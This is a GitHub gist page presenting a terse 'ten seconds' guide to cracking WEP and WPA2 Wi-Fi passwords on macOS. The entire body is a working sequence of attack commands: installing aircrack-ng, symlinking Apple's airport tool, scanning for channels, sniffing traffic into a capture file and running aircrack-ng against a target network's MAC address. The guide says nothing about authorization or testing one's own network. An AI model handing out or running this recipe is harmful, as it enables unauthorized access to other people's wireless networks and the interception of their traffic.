-
-
Save mihai-salari/44183e69e506425d1d337d7beb7cedc1 to your computer and use it in GitHub Desktop.
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Install the latest Xcode, with the Command Line Tools. | |
// Install Homebrew | |
// Install aircrack-ng: | |
brew install aircrack-ng | |
// Create the following symlink: | |
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/sbin/airport | |
// Figure out which channel you need to sniff: | |
sudo airport -s | |
// Sniff | |
// NOTE: the cap_file will be located in the /tmp/airportSniff*.cap. | |
sudo airport en1 sniff [CHANNEL] | |
// Crack | |
// Optional flags: -1 only 1 try with PTW | |
// -a attack mode (1/WEP, 2/WPA-PSK) | |
aircrack-ng -b [TARGET_MAC_ADDRESS] [CAP_FILE] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment